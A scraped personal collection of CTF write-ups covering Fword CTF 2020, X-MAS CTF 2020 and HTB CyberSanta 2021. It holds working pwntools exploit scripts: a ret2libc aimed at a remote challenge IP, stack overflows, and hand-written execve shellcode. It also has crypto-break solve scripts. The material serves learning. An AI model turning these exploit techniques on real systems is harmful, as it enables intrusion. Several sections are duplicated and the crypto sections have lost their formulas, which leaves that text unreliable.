1 of 18

CTFs

Fword CTF 2020

https://ctftime.org/event/1066

I did not solve the vast majority of challenges I am writing up here, but instead I am doing it to consolidate my own understanding of it. I also hope the writeups you find here help you understand the challenge, and if they did then it's fulfilled it's purpose and whether or not I originally completed them is irrelevant :)

Binary Exploitation

Molotov

A ret2libc with a given leak

‌Overview

Running the binary prints and hex value and prompts for input:

$ ./molotov
f7d9ef00
Input :

We can definitely cause it to segfault:

$ python3 -c 'print("A"*300)' | ./molotov
f7d61f00
Input : 
Segmentation fault

So let's work out what this value is and how we can use it.‌

Decompilation

‌

We chuck the binary into GHidra and get a simple disassembly. main calls vuln and does almost nothing else. vuln, however, has some interesting stuff:

int vuln(void){
    char buffer [24];
    
    printf("%x\n",system);
    puts("Input : ");
    
    gets(buffer);
    
    return 0;
}

‌

It prints the address of system! Awesome.‌

Let's run the binary on the remote serevr to leak the libc version.

$ nc 54.210.217.206 1240
f7d3c8b0
Input :

‌

So now we essentially have a libc leak, we head over to find the libc version.

Annoyingly, there are 4 possible libc versions, and we can only get it from trial and error. Aside from the libc version itself, the exploit is quite simple - subtract the offset of system from the leaked address to get libc base, then use that to get the location of /bin/sh.

The correct libc version is 2.30-0ubuntu2.1_i386.‌

Exploitation

from pwn import *

elf = context.binary = ELF('./molotov')

if args.REMOTE:
    libc = ELF('./libc-remote.so')
    p = remote('54.210.217.206', 1240)
else:
    libc = elf.libc
    p = process()

addr = int(p.recvline(), 16)
p.clean()

libc.address = addr - libc.sym['system']

rop = ROP(libc)
rop.raw('A' * 32)
rop.system(next(libc.search(b'/bin/sh\x00')))

p.sendline(rop.chain())
p.interactive()

Reversing

XO

Messing with the XOR

Overview

Let's try running the file:

$ ./task 
Error while opening the file. Contact an admin!
: No such file or directory

Perhaps it wants a flag.txt file? Let's create one with the words FwordCTF{flag_flaggety_flag}:

$ ./task 

input : 
test
4
input : 
pao
2

This isn't quite counting the number of letters we enter. Let's see if the disassembly can shed any light on it.

Disassembly

First thing we notice is that every libc function is built into the binary due to the stripped names. We can confirm this with rabin2:

$ rabin2 -I task
[...]
static  true
[...]

Cleaning Up

Many of the functions can be handled using the return address and the general context. Some of the decompilation - especially the references to strings - may not have loaded in yet; make sure GHidra finishes analysing. We don't even need the exact C names, as long as we get the general gist it's all fine.

void main(void)
{
  int min_length;
  void *flag;
  void *input;
  long lVar1;
  long **xored;
  ulong flag_length;
  ulong input_length;
  long **in_RCX;
  long **extraout_RDX;
  long **output;
  ulong in_R8;
  long *in_R9;
  int i;
  
  FUN_00400b7d();
  
  flag = malloc(0x32);
  input = malloc(0x32);
  lVar1 = read("flag.txt",&DAT_004ac8e8);
  if (lVar1 == 0) {
    puts("Error while opening the file. Contact an admin!\n");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  output = (long **)&DAT_004ac929;
  FUN_0040fd20(lVar1,&DAT_004ac929,flag);
  do {
    xored = (long **)malloc(0x32);
    FUN_00410cf0("input : ",output);
    scanf("%s");
    flag_length = strlen(flag);
    input_length = strlen(input);
    if (input_length < flag_length) {
      min_length = strlen(input);
    }
    else {
      min_length = strlen(flag);
    }
    i = 0;
    while (i < min_length) {
      in_RCX = (long **)(ulong)*(byte *)((long)input + (long)i);
      *(byte *)((long)xored + (long)i) =
           *(byte *)((long)flag + (long)i) ^ *(byte *)((long)input + (long)i);
      i = i + 1;
    }
    output = (long **)strlen(xored);
    FUN_0040f840(&DAT_004ac935);
    FUN_00420ab0(xored,output,extraout_RDX,in_RCX,in_R8,in_R9);
  } while( true );
}

The python equivalent of this is roughly

value = ''

for x, y in zip(flag, input):
  value += chr(ord(x) ^ ord(y))

print(len(garbage))

In short, it's an XOR function.

Working out the Flaw

To calculate the length of the string it uses

output = (long **)strlen(xored);

The key here is strlen stops at a null byte. If you input a character with the same value as the flag character in that position, it will XOR to become \x00.

Using the Flaw

We can test every possible character. If the returned value is one less than the length of the string, the last character is correct as it XORed to create a null byte.

To test different offsets we can pad using a value definitely not in the flag, such as #.

Exploit

Local

from pwn import *
from string import printable

p = process('./task')

known = ''

while True:
    for char in printable:
        p.recvline()
        p.sendline('#' * len(known) + char)     # '#' won't be in it, so any null byte is definitely the char we test

        resp = int(p.recvline().strip())

        if resp == len(known):                  # if it's the same length as the known, then the char we sent XORed to a null byte
            log.info(f'Character is {char}')
            known += char                       # append it to what we know

            if char == '}':                     # if '}', probably the end of the flag - print and exit
                log.success(f'Flag: {known}')
                exit(0)
            
            break                               # we know the char, we can exit the for loop and run it again with a different known length

Now we can just switch out the process type on the remote server.

Remote

from pwn import *
from string import printable

if args.REMOTE:
    p = remote('xo.fword.wtf', 5554)
else:
    p = process('./task')

known = ''

while True:
    for char in printable:
        p.recvline()
        p.sendline('#' * len(known) + char)     # '#' won't be in it, so any null byte are definitely the char we test

        resp = int(p.recvline().strip())

        if resp == len(known):                  # if it's the same length as the known, then the char we sent XORed to a null byte
            log.info(f'Character is {char}')
            known += char                       # append it to what we know

            if char == '}':                     # if '}', probably the end of the flag - print and exit
                log.success(f'Flag: {known}')
                exit(0)
            
            break                               # we know the char, we can exit the for loop and run it again with a different known length

Flag: NuL1_Byt35?15_IT_the_END?Why_i_c4nT_h4ndl3_That!

X-MAS CTF 2020

I didn't manage to solve a huge number of these - I was quite busy, plus I suck - but I'll dump some writeups here for those I caught up on later.

Pwn

Do I Know You?

If we disassemble, the solution is pretty clear.

[...]
|           0x55c00f08685d      4889c7         mov rdi, rax
│           0x55c00f086860      b800000000     mov eax, 0
│           0x55c00f086865      e846feffff     call sym.imp.gets
│           0x55c00f08686a      488b55f0       mov rdx, qword [var_10h]
│           0x55c00f08686e      b8efbeadde     mov eax, 0xdeadbeef
│           0x55c00f086873      4839c2         cmp rdx, rax
│       ┌─< 0x55c00f086876      7522           jne 0x55c00f08689a
│       │   0x55c00f086878      488d3de90000.  lea rdi, str.X_MAS_Fake_flag...
[...]

gets() is used to take in input, then the contents of another local variable are compared to 0xdeadbeef. Basic buffer overflow then overwrite a local variable:

from pwn import *

elf = context.binary = ELF('./chall')
p = remote('challs.xmas.htsp.ro', 2008)

payload = b'A' * 32
payload += p64(0xdeadbeef)

p.sendlineafter('you?\n', payload)
print(p.recvuntil('}'))

X-MAS{ah_yes__i_d0_rememb3r_you}

Naughty

Overview

We receive a file called chall. NX is disabled, which is helpful. We inject shellcode, use a jmp rsp gadget and execute our own shellcode.

Decompilation

main() is a fairly simple binary:

int main(int a1, char **a2, char **a3)
{
  char input[46]; // [rsp+0h] [rbp-30h] BYREF
  __int16 check; // [rsp+2Eh] [rbp-2h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  
  check = -6913;
  puts("Tell Santa what you want for XMAS");
  fgets(input, 71, stdin);
  puts("Nice. Hope you haven't been naughty");
  if ( check != -6913 )
  {
    puts("Oh no....no gifts for you this year :((");
    exit(0);
  }
  return 0LL;
}

The buffer is 48 bytes long. After the buffer there is 16-bit integer check, which acts as a canary. Then there are 8 bytes for the stored RBP. The total input it 71, meaning after the stored RBP we have 13 bytes of overflow, including the RIP. No ROP is possible.

Note that the value -6913 is actually 0xe4ff.

This was rather misleading as they gave you the LIBC.

Exploitation

Firstly:

from pwn import *

elf = context.binary = ELF('./chall', checksec=False)

if args.REMOTE:
    p = remote('challs.xmas.htsp.ro', 2000)
else:
    p = process()

jump_rsp = 0x40067f

Now we need some shellcode. pwntools' shellcraft.sh() is 2 bytes too long, so we'll have to make it manually.

The general payload is as follows:

/bin/sh\x00 so we have it in a known location (relative to RSP)
Shellcode
Padding
0xe4ff to overwrite the pseudo-canary
Padding
jmp rsp

Now we need to decide what shellcode we want to run. Well, since RSP points at the stack, we know that it will always be a static offset off our buffer. If we calculate it, we can just do

sub rsp, x
jmp rsp

And execute the other half of our code! And at this point RSP will be exactly 8 bytes off /bin/sh\x00, so we can use it to populate RDI as well!

exploit = b'/bin/sh\x00'
exploit += asm('''
    xor rsi, rsi
    xor rdx, rdx
    lea rdi, [rsp-8]
    mov rax, 0x3b
    syscall
''')    # rsi/rdx need to be null, rdi points at /bin/sh, rax execve syscall number
exploit += b'A' * (46 - len(exploit))    # padding
exploit += p16(0xe4ff)
exploit += b'B' * 8
exploit += p64(jump_rsp)
exploit += asm('''
    sub rsp, 0x38
    jmp rsp
''')    # RSP point to beginning of shellcode, use this to point RIP there
 
p.sendline(exploit)
p.interactive()

X-MAS{sant4_w1ll_f0rg1ve_y0u_th1s_y3ar}

Web

Not really my forte, but here we go, I can only get better.

PHP Master

Once we visit the URL, we are shown some code:

Clearly this is some type of exploit, but I'm not that familiar with it except for 0e md5 hashes and stuff. However, there are some restrictions here:

There can be no e character in either parameter
The two parameters must be the same length
They can't strictly equal each other (!==) but they must loosely equal each other (==)

HTB CyberSanta 2021

Crypto

Common Mistake

Common Mod, DIfferent e

In this challenge, we are given two sets of , and .

The plaintext encrypted to give is the same, and we can observe that the choice of is also the same, meaning the only difference is in the choice of . Here we can use some cool maffs with and to retrieve the original plaintext .

Firstly, if the greatest common divisor of and is , then there exists and such that

To calculate this, we can use the . But why is this helpful?

Well if we know that and and we know such that , we can then use this to calculate like this:

In practise is likely to be negative, and in modular arithmetic we use negative powers using the . Luckily, Sage can do this for us by default, so we can do even less steps:

And we get the flag as HTB{c0mm0n_m0d_4774ck_15_4n07h3r_cl4ss1c}.

Missing Reindeer

Cube Root Attack

In this challenge, we get a message.eml file containing an email:

Applications such as Outlook block downloading the file due to it's "malicious nature", but we can open the .eml file in VS Code easily and extract two things:

Firstly, there is a secret.enc file with base64-encoded ciphertext:

Secondly, there is a pubkey.der file containing an RSA public key:

Analysing the Public Key

Recovering c

We'll use the gmpy2 iroot() function to calculate the cube root:

And bingo bango, we get the flag as HTB{w34k_3xp0n3n7_ffc896}.

Xmas Spirit

We get given challenge.py and encrypted.bin. Analysing challenge.py:

And appends the result of that as the encrypted character in encrypted.bin.

Analysis

Gives us

So we can form two equations here using this information:

We subtract (2) from (1) to get that

Solution

And the resulting PDF has the flag HTB{4ff1n3_c1ph3r_15_51mpl3_m47h5} within.

Meet Me Halfway

Meet-in-the-middle attack on AES

We are given challenge.py, which does the following:

Creates two keys
- Key1 is cyb3rXm45!@# + 4 random bytes from 0123456789abcdef
- Key2 is 4 random bytes from 0123456789abcdef + cyb3rXm45!@#
Encrypts the flag with Key1 using AES-ECB
Encrypts the encrypted flag with Key2 using AES-ECB

We can use a meet-in-the-middle attack to retreive both keys. The logic here is simple. Firstly, there are 16 possible characters for each of the 4 random bytes, which is easily bruteforceable ( $16^4$ ).

We can also encrypt a given input and get the result - I choose to send 12345678 as the hex-encoded plaintext and receive . For these keys, the encrypted flag is given as:

43badc9cfb6198e97e5c0085eba941043982169877c2ec51995b5527d32244ebf3af4453e73408786a9eb39cd7fbb731afd940617e7ad1484ac017a7c0c3798cdb4a96ed96e816cf2a09fd4b39715064d0bba8bbf37e5d713f0af6a850985644

The Attack

Now we have a known plaintext and ciphertext, we can use both one after the other and bruteforce possible keys. Note that the encryption looks like this:

We do not know what the intermediate value x is, but we can use brute force to calculate it by

Looping through all possibilities for key1 and saving the encrypted version of 12345678
Looping through all possibilities for key2 and saving the decryption of 449e2eb...
Finding the intersection between the encryption with key1 and the decryption with key2

Once we find this intersection, we can use that to work back and calculate key1 and key2, which we can then utilise to decrypt the flag.

Solve Script

from itertools import permutations

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad


key_start = b'cyb3rXm45!@#'
alphabet = b'0123456789abcdef'

enc_flag = bytes.fromhex('43badc9cfb6198e97e5c0085eba941043982169877c2ec51995b5527d32244ebf3af4453e73408786a9eb39cd7fbb731afd940617e7ad1484ac017a7c0c3798cdb4a96ed96e816cf2a09fd4b39715064d0bba8bbf37e5d713f0af6a850985644')

known_text = pad(bytes.fromhex("12345678"), 16)
known_ciphertext = bytes.fromhex('449e2eb3a7f793184ef41a8042739307')

# brute all encryptions
encryption_table = {}           # key : value -> encryption result : key

for key in permutations(alphabet, 4):
    key = key_start + bytes(key)
    cipher = AES.new(key, AES.MODE_ECB)
    encrypted_custom = cipher.encrypt(known_text)
    encryption_table[encrypted_custom] = key


# brute all decryptions
decryption_table = {}           # key : value -> decryption result : key

for key in permutations(alphabet, 4):
    key = bytes(key) + key_start
    cipher = AES.new(key, AES.MODE_ECB)
    decrypted_custom = cipher.decrypt(known_ciphertext)
    decryption_table[decrypted_custom] = key


# find the intersection between the keys of decryption_table and encryption_table
# if there is an intersection, we can cross-reference the AES key we used
encryption_table_set = set(encryption_table.keys())
decryption_table_set = set(decryption_table.keys())

intersection = encryption_table_set.intersection(decryption_table_set).pop()
encryption_key = encryption_table[intersection]     # set the encryption key now we know which it is
decryption_key = decryption_table[intersection]     # set the decryption key now we know which it is

# now decrypt flag_enc twice
cipher1 = AES.new(encryption_key, AES.MODE_ECB)
cipher2 = AES.new(decryption_key, AES.MODE_ECB)

flag = cipher2.decrypt(enc_flag)
flag = cipher1.decrypt(flag).decode().strip()

print(flag)

And we get the flag as HTB{m337_m3_1n_7h3_m1ddl3_0f_3ncryp710n}!

XO

Messing with the XOR

Overview

Let's try running the file:

$ ./task 
Error while opening the file. Contact an admin!
: No such file or directory

Perhaps it wants a flag.txt file? Let's create one with the words FwordCTF{flag_flaggety_flag}:

$ ./task 

input : 
test
4
input : 
pao
2

This isn't quite counting the number of letters we enter. Let's see if the disassembly can shed any light on it.

Disassembly

First thing we notice is that every libc function is built into the binary due to the stripped names. We can confirm this with rabin2:

$ rabin2 -I task
[...]
static  true
[...]

Cleaning Up

void main(void)
{
  int min_length;
  void *flag;
  void *input;
  long lVar1;
  long **xored;
  ulong flag_length;
  ulong input_length;
  long **in_RCX;
  long **extraout_RDX;
  long **output;
  ulong in_R8;
  long *in_R9;
  int i;
  
  FUN_00400b7d();
  
  flag = malloc(0x32);
  input = malloc(0x32);
  lVar1 = read("flag.txt",&DAT_004ac8e8);
  if (lVar1 == 0) {
    puts("Error while opening the file. Contact an admin!\n");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  output = (long **)&DAT_004ac929;
  FUN_0040fd20(lVar1,&DAT_004ac929,flag);
  do {
    xored = (long **)malloc(0x32);
    FUN_00410cf0("input : ",output);
    scanf("%s");
    flag_length = strlen(flag);
    input_length = strlen(input);
    if (input_length < flag_length) {
      min_length = strlen(input);
    }
    else {
      min_length = strlen(flag);
    }
    i = 0;
    while (i < min_length) {
      in_RCX = (long **)(ulong)*(byte *)((long)input + (long)i);
      *(byte *)((long)xored + (long)i) =
           *(byte *)((long)flag + (long)i) ^ *(byte *)((long)input + (long)i);
      i = i + 1;
    }
    output = (long **)strlen(xored);
    FUN_0040f840(&DAT_004ac935);
    FUN_00420ab0(xored,output,extraout_RDX,in_RCX,in_R8,in_R9);
  } while( true );
}

The python equivalent of this is roughly

value = ''

for x, y in zip(flag, input):
  value += chr(ord(x) ^ ord(y))

print(len(garbage))

In short, it's an XOR function.

Working out the Flaw

To calculate the length of the string it uses

output = (long **)strlen(xored);

The key here is strlen stops at a null byte. If you input a character with the same value as the flag character in that position, it will XOR to become \x00.

Using the Flaw

We can test every possible character. If the returned value is one less than the length of the string, the last character is correct as it XORed to create a null byte.

To test different offsets we can pad using a value definitely not in the flag, such as #.

Exploit

Local

from pwn import *
from string import printable

p = process('./task')

known = ''

while True:
    for char in printable:
        p.recvline()
        p.sendline('#' * len(known) + char)     # '#' won't be in it, so any null byte is definitely the char we test

        resp = int(p.recvline().strip())

        if resp == len(known):                  # if it's the same length as the known, then the char we sent XORed to a null byte
            log.info(f'Character is {char}')
            known += char                       # append it to what we know

            if char == '}':                     # if '}', probably the end of the flag - print and exit
                log.success(f'Flag: {known}')
                exit(0)
            
            break                               # we know the char, we can exit the for loop and run it again with a different known length

Now we can just switch out the process type on the remote server.

Remote

from pwn import *
from string import printable

if args.REMOTE:
    p = remote('xo.fword.wtf', 5554)
else:
    p = process('./task')

known = ''

while True:
    for char in printable:
        p.recvline()
        p.sendline('#' * len(known) + char)     # '#' won't be in it, so any null byte are definitely the char we test

        resp = int(p.recvline().strip())

        if resp == len(known):                  # if it's the same length as the known, then the char we sent XORed to a null byte
            log.info(f'Character is {char}')
            known += char                       # append it to what we know

            if char == '}':                     # if '}', probably the end of the flag - print and exit
                log.success(f'Flag: {known}')
                exit(0)
            
            break                               # we know the char, we can exit the for loop and run it again with a different known length

Flag: NuL1_Byt35?15_IT_the_END?Why_i_c4nT_h4ndl3_That!

Meet Me Halfway

Meet-in-the-middle attack on AES

We are given challenge.py, which does the following:

Creates two keys
- Key1 is cyb3rXm45!@# + 4 random bytes from 0123456789abcdef
- Key2 is 4 random bytes from 0123456789abcdef + cyb3rXm45!@#
Encrypts the flag with Key1 using AES-ECB
Encrypts the encrypted flag with Key2 using AES-ECB

We can also encrypt a given input and get the result - I choose to send 12345678 as the hex-encoded plaintext and receive . For these keys, the encrypted flag is given as:

43badc9cfb6198e97e5c0085eba941043982169877c2ec51995b5527d32244ebf3af4453e73408786a9eb39cd7fbb731afd940617e7ad1484ac017a7c0c3798cdb4a96ed96e816cf2a09fd4b39715064d0bba8bbf37e5d713f0af6a850985644

The Attack

Now we have a known plaintext and ciphertext, we can use both one after the other and bruteforce possible keys. Note that the encryption looks like this:

We do not know what the intermediate value x is, but we can use brute force to calculate it by

Looping through all possibilities for key1 and saving the encrypted version of 12345678
Looping through all possibilities for key2 and saving the decryption of 449e2eb...
Finding the intersection between the encryption with key1 and the decryption with key2

Once we find this intersection, we can use that to work back and calculate key1 and key2, which we can then utilise to decrypt the flag.

Solve Script

from itertools import permutations

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad


key_start = b'cyb3rXm45!@#'
alphabet = b'0123456789abcdef'

enc_flag = bytes.fromhex('43badc9cfb6198e97e5c0085eba941043982169877c2ec51995b5527d32244ebf3af4453e73408786a9eb39cd7fbb731afd940617e7ad1484ac017a7c0c3798cdb4a96ed96e816cf2a09fd4b39715064d0bba8bbf37e5d713f0af6a850985644')

known_text = pad(bytes.fromhex("12345678"), 16)
known_ciphertext = bytes.fromhex('449e2eb3a7f793184ef41a8042739307')

# brute all encryptions
encryption_table = {}           # key : value -> encryption result : key

for key in permutations(alphabet, 4):
    key = key_start + bytes(key)
    cipher = AES.new(key, AES.MODE_ECB)
    encrypted_custom = cipher.encrypt(known_text)
    encryption_table[encrypted_custom] = key


# brute all decryptions
decryption_table = {}           # key : value -> decryption result : key

for key in permutations(alphabet, 4):
    key = bytes(key) + key_start
    cipher = AES.new(key, AES.MODE_ECB)
    decrypted_custom = cipher.decrypt(known_ciphertext)
    decryption_table[decrypted_custom] = key


# find the intersection between the keys of decryption_table and encryption_table
# if there is an intersection, we can cross-reference the AES key we used
encryption_table_set = set(encryption_table.keys())
decryption_table_set = set(decryption_table.keys())

intersection = encryption_table_set.intersection(decryption_table_set).pop()
encryption_key = encryption_table[intersection]     # set the encryption key now we know which it is
decryption_key = decryption_table[intersection]     # set the decryption key now we know which it is

# now decrypt flag_enc twice
cipher1 = AES.new(encryption_key, AES.MODE_ECB)
cipher2 = AES.new(decryption_key, AES.MODE_ECB)

flag = cipher2.decrypt(enc_flag)
flag = cipher1.decrypt(flag).decode().strip()

print(flag)

And we get the flag as HTB{m337_m3_1n_7h3_m1ddl3_0f_3ncryp710n}!

CTFs

Fword CTF 2020

Binary Exploitation

Molotov

‌Overview

Decompilation

Exploitation

Reversing

XO

Overview

Disassembly

Cleaning Up

Working out the Flaw

Using the Flaw

Exploit

Local

Remote

X-MAS CTF 2020

Pwn

Do I Know You?

Naughty

Overview

Decompilation

Exploitation

Web

PHP Master

HTB CyberSanta 2021

Crypto

Common Mistake

Missing Reindeer

Contents

Analysing the Public Key

Recovering c

Xmas Spirit

Contents

Analysis

Solution

Meet Me Halfway

Contents

The Attack

Solve Script

Fword CTF 2020

Do I Know You?

Naughty

Overview

Decompilation

Exploitation

XO

Overview

Disassembly

Cleaning Up

Working out the Flaw

Using the Flaw

Exploit

Local

Remote

Web

X-MAS CTF 2020

Molotov

‌Overview

Decompilation

Exploitation

Missing Reindeer

Contents

Analysing the Public Key

Recovering c

PHP Master

Xmas Spirit

Contents

Analysis

Solution

Common Mistake

Meet Me Halfway

Contents

The Attack

Solve Script